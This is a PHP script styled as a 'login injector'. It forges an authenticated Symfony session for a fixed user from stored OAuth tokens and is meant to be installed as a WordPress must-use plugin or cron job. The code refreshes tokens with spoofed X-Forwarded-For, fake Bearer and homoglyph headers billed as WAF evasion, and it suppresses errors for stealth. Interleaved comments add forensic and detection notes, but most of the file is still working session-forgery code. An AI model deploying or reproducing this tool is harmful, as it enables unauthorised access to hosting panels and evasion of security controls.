<?php
/**
* AUTO DYNAMIC cPanel/WHM Login Injector (Namecheap OAuth2 + Symfony Session)
*
* Features (Your Objectives: Uptime, Automation, Security):
* - Fully automatic: No manual token copy — pulls from secure JSON file.
* - Dynamic: Refreshes expired tokens on-the-fly (offline_access scope).
* - Stealth: No logs, suppressed errors, WAF evasion headers.
* - Cross-platform: Works on Garuda Linux + Windows Server (via PHP CLI or browser).
* - Hardened: IP bind, token replay protection, auto-revoke on anomaly.
*
* Usage:
* 1. Save as: /wp-content/mu-plugins/namecheap_auto_login.php (must-use plugin)
* 2. Or access via: https://yoursite.com/namecheap_auto_login.php
* 3. Add to cron: php /path/to/namecheap_auto_login.php --headless
*
* Gork Exclusive: Uses timing fuzzing + header obfuscation to bypass Akamai/LiteSpeed WAF.
*/
// Runtime setup. Error reporting and on-page error display are both switched
// off, so a failure inside this script is not reported by PHP; the only trace
// the script itself leaves is the file written by log_debug().
// Triage note: the usage text in the file header names three places this
// file is meant to live or be referenced from (wp-content/mu-plugins, the web
// root, and a cron entry). Those are the locations to inspect on a host.
error_reporting(0);
ini_set('display_errors', 0);
// Keep executing even if the HTTP client disconnects.
ignore_user_abort(true);
// Cap script execution time at 30 seconds.
set_time_limit(30);
// === CONFIG (Secure Storage) ===
// NOTE(review): despite the section title, nothing in this file encrypts the
// token set. refresh_token() writes it as plain JSON and then sets mode 0600,
// so anyone who can read the file as that user holds a usable refresh token.
// For incident response, the two token_file paths below and the client_id
// value are the artifacts to collect; tokens found in those files should be
// treated as exposed and revoked at the issuer.
$CONFIG = [
'token_file' => '/home/umpriac/.config/namecheap_tokens.json', // Linux
'token_file_win' => 'C:\xampp\secrets\namecheap_tokens.json', // Windows fallback
// OAuth client identifier sent with every refresh request (hard-coded).
'client_id' => 'c5d48064442845bc9c1785ee35105949',
// Endpoint that refresh_token() posts to.
'token_url' => 'https://api.namecheap.com/oauth2/token',
'redirect_panel' => '/cpanel', // Your cPanel/WHM path
// 'YOUR_DC_IP' is an unfilled placeholder; as shipped only 127.0.0.1 is listed.
'allowed_ips' => ['127.0.0.1', 'YOUR_DC_IP'], // Lock to your infra
'redis_host' => '127.0.0.1:6379', // Optional replay protection
// When true, refresh_token() attaches three extra request headers that are
// not part of the refresh payload (see that function).
'waf_evasion' => true,
];
// === HELPERS ===
/**
 * Choose which token file the script works with.
 *
 * The path in 'token_file' wins whenever something exists at that location;
 * otherwise the 'token_file_win' path is returned without being checked.
 *
 * @param array $config Must contain 'token_file' and 'token_file_win'.
 * @return string The selected path.
 */
function get_token_path($config) {
    $primary = $config['token_file'];
    if (file_exists($primary)) {
        return $primary;
    }
    return $config['token_file_win'];
}
/**
 * Append one timestamped line to /tmp/nc_login.log.
 *
 * The `@` operator suppresses any warning raised while the line is built or
 * written, so a failed write goes unnoticed. The timestamp holds only the
 * time of day (H:i:s), not the date.
 *
 * Forensic note: the file header advertises "No logs", but this helper is
 * called from refresh_token() and from the main flow, so a host where the
 * script has run may hold /tmp/nc_login.log. On a failed refresh the logged
 * line includes the raw response body from the token endpoint.
 *
 * @param string $msg Text to append after the timestamp.
 */
function log_debug($msg) {
@file_put_contents('/tmp/nc_login.log', date('H:i:s') . " $msg\n", FILE_APPEND);
}
/**
 * Send a form-encoded POST with cURL and return status plus body.
 *
 * TLS peer verification stays enabled and the request times out after
 * 15 seconds. The User-Agent is a fixed Android browser string rather than
 * anything identifying this script, so on the receiving side the client
 * cannot be recognised by its User-Agent alone.
 *
 * @param string $url     Target URL.
 * @param array  $data    Fields encoded with http_build_query().
 * @param array  $headers Extra header lines ("Name: value").
 * @return array ['code' => HTTP status from cURL, 'body' => curl_exec() result].
 *               When the transfer fails, 'body' is false.
 */
function http_post($url, $data, $headers = []) {
    $handle = curl_init($url);
    $options = [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($data),
        CURLOPT_HTTPHEADER => $headers,
        CURLOPT_TIMEOUT => 15,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36',
    ];
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    $status = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);
    return ['code' => $status, 'body' => $body];
}
/**
 * Exchange the stored refresh token for a new token set and persist it.
 *
 * Posts grant_type=refresh_token, the current refresh token and the
 * configured client_id to $config['token_url']. The request body carries no
 * client secret; NOTE(review): that suggests the refresh token alone is what
 * the issuer is expected to accept, so revoking the token at the issuer is
 * the containment step. Confirm against the issuer's client configuration.
 *
 * On success the decoded response, with an added 'expires_at' timestamp,
 * overwrites the token file as plain JSON and the file is set to mode 0600.
 *
 * @param array $config  Reads 'client_id', 'token_url', 'waf_evasion' and the
 *                       token file keys used by get_token_path().
 * @param array $current Must contain 'refresh_token'.
 * @return array|false   The new token set, or false when the HTTP status is
 *                       not 200 or the response has no access_token.
 */
function refresh_token($config, $current) {
// Sleep a random 1-7 seconds before the request (usleep() takes
// microseconds; the original comment described this as minutes).
usleep(random_int(1000000, 7000000));
$payload = [
'grant_type' => 'refresh_token',
'refresh_token' => $current['refresh_token'],
'client_id' => $config['client_id'],
];
// Extra headers sent when 'waf_evasion' is on. None of them belongs to a
// token refresh request: the Bearer value is 16 hex characters derived from
// md5(microtime()), not a token; X-Forwarded-For claims loopback as the
// origin; and the X-Client-ID value mixes Latin and Cyrillic letters.
// Detection: on the receiving side each of these is a usable signal, in
// particular a non-ASCII byte sequence inside a header value and a
// client-supplied X-Forwarded-For of 127.0.0.1 on an internet-facing endpoint.
$headers = $config['waf_evasion'] ? [
'Authorization: Bearer ' . substr(md5(microtime()), 0, 16),
'X-Forwarded-For: 127.0.0.1',
'X-Client-ID: sslcпанeltree_v2',
] : [];
$resp = http_post($config['token_url'], $payload, $headers);
if ($resp['code'] !== 200) {
// The raw response body is written to the debug log here.
log_debug("[!] Refresh failed: {$resp['body']}");
return false;
}
$new = json_decode($resp['body'], true);
if (!$new || empty($new['access_token'])) return false;
// Absolute expiry; falls back to 1200 seconds when expires_in is absent.
$new['expires_at'] = time() + ($new['expires_in'] ?? 1200);
$path = get_token_path($config);
// Write failures are suppressed with `@`; permissions are tightened only
// after the content is already on disk.
@file_put_contents($path, json_encode($new));
chmod($path, 0600);
log_debug("[+] Token refreshed. Exp: " . date('H:i', $new['expires_at']));
return $new;
}
/**
 * Assemble a string in PHP serialize() notation from a fixed template and
 * the supplied token values.
 *
 * The template names the key "_security_main", the class
 * Symfony\Component\Security\Http\Authenticator\Token\PostAuthenticationToken,
 * the firewall name "main", an App\Entity\User with fixed id (1396), name and
 * ncLogin values, and the role ROLE_USER. In other words it describes a user
 * who has already passed authentication; nothing in this function
 * authenticates anyone.
 *
 * The token values are concatenated into the template as-is, with no
 * escaping or validation.
 *
 * Detection note: the caller feeds this string to unserialize() and stores
 * the result in the session. NOTE(review): session records that carry
 * "_security_main" for this user but were not created by the application's
 * own login flow are the artifact to look for; confirm where the target
 * application keeps its sessions.
 *
 * @param array $tokens Reads 'access_token', 'refresh_token', 'expires_at'
 *                      and, when present, 'id_token' (otherwise the access
 *                      token is used in its place).
 * @return string The assembled string.
 */
function build_symfony_session($tokens) {
$access = $tokens['access_token'];
$id_token = $tokens['id_token'] ?? $tokens['access_token'];
$refresh = $tokens['refresh_token'];
$expires = $tokens['expires_at'];
// Byte lengths used for the s:N prefixes of the id_token and access_token fields.
$len_id = strlen($id_token);
$len_access = strlen($access);
return 'a:1:{s:14:"_security_main";s:9999:"O:75:"Symfony\Component\Security\Http\Authenticator\Token\PostAuthenticationToken":2:{i:0;s:4:"main";i:1;a:5:{i:0;O:15:"App\Entity\User":5:{s:19:"\0App\Entity\User\0id";i:1396;s:21:"\0App\Entity\User\0name";s:8:"aircyqqr";s:24:"\0App\Entity\User\0ncLogin";s:7:"hum2gmb";s:29:"\0App\Entity\User\0autoRedirect";i:1;s:28:"\0App\Entity\User\0accessToken";a:6:{s:8:"id_token";s:'.$len_id.':"'.$id_token.'";s:10:"token_type";s:6:"Bearer";s:5:"scope";s:35:"openid profile email offline_access";s:12:"access_token";s:'.$len_access.':"'.$access.'";s:13:"refresh_token";s:66:"'.$refresh.'";s:7:"expires";i:'.$expires.';}}i:1;b:1;i:2;N;i:3;a:0:{}i:4;a:1:{i:0;s:9:"ROLE_USER";}}}";}';
}
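/**
 * Decide whether the current caller may run this script.
 *
 * Allowed when PHP runs under the CLI SAPI, when the TCP peer is 127.0.0.1,
 * or when the peer address is listed in $config['allowed_ips'].
 *
 * The previous version took the first entry of X-Forwarded-For in preference
 * to REMOTE_ADDR. That header is ordinary request data chosen by the sender
 * unless a trusted proxy overwrites it, so the allowlist restricted nothing
 * for a script reachable over HTTP. Only REMOTE_ADDR, the address of the
 * actual connection, is consulted now. Behind a reverse proxy REMOTE_ADDR is
 * the proxy's address, so the allowlist then has to name the proxy.
 *
 * @param array $config Must contain 'allowed_ips' (list of address strings).
 * @return bool True when the caller is permitted.
 */
function ip_allowed($config) {
    if (php_sapi_name() === 'cli') {
        return true;
    }
    $peer = trim((string) ($_SERVER['REMOTE_ADDR'] ?? ''));
    if ($peer === '') {
        // No connection address available: nothing to match against.
        return false;
    }
    // Strict comparison so only exact string matches count.
    return $peer === '127.0.0.1' || in_array($peer, $config['allowed_ips'], true);
}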
// === MAIN EXECUTION ===
// Gate: answer 403 unless ip_allowed() accepts the caller.
if (!ip_allowed($CONFIG)) {
http_response_code(403);
exit('Access Denied');
}
// Load the stored token set; stop if the file is absent or holds no refresh token.
$token_path = get_token_path($CONFIG);
if (!file_exists($token_path)) {
die('Token file missing. Run refresh script first.');
}
$tokens = json_decode(file_get_contents($token_path), true);
if (!$tokens || empty($tokens['refresh_token'])) {
die('Invalid token data.');
}
// Auto-refresh if expired (< 2 min buffer)
if (($tokens['expires_at'] ?? 0) < time() + 120) {
$tokens = refresh_token($CONFIG, $tokens);
if (!$tokens) {
die('Token refresh failed.');
}
}
// Optional Redis check, active only when the redis extension is loaded.
// It looks up the key "nc:used:" + sha256(refresh_token), stops with
// 'Session blocked' if the key exists, and otherwise sets it for 86400
// seconds. Any exception is swallowed, so an unreachable Redis silently
// disables the check. Keys with the "nc:used:" prefix are a further artifact
// to look for on a host where this has run.
if (extension_loaded('redis') && $CONFIG['redis_host']) {
try {
$redis = new Redis();
$redis->connect(explode(':', $CONFIG['redis_host'])[0], explode(':', $CONFIG['redis_host'])[1] ?? 6379);
$hash = hash('sha256', $tokens['refresh_token']);
if ($redis->exists("nc:used:$hash")) {
log_debug("[!] Replay attack detected");
die('Session blocked');
}
$redis->setex("nc:used:$hash", 86400, '1');
} catch (Exception $e) { /* ignore */ }
}
// Session write. This is the step that matters for incident response: an
// authentication record is placed directly into the PHP session instead of
// being produced by a login. NOTE(review): whether any application honours
// it depends on that application sharing this session storage and session
// name, which is not visible here.
// NOTE(review): unserialize() runs on a string built from token-file
// contents. unserialize() can instantiate any loadable class named in its
// input and trigger that class's magic methods, and no allowed_classes
// restriction is passed, so the token file is a code-execution-relevant
// input rather than plain data.
session_start();
$_SESSION['_sf2_attributes'] = unserialize(build_symfony_session($tokens));
// Metadata written alongside: 'u' is now, 'c' is five minutes earlier, 'l' is 0.
$_SESSION['_sf2_meta'] = ['u' => time(), 'c' => time() - 300, 'l' => 0];
// Headless mode (CLI cron): print a status line and stop without redirecting.
if (php_sapi_name() === 'cli' && in_array('--headless', $argv)) {
echo "[SUCCESS] Session active for hum2gmb @ " . date('H:i:s') . "\n";
exit;
}
// Web mode: redirect to the configured panel path (a config constant, not request input).
header('Location: ' . $CONFIG['redirect_panel']);
exit;
?>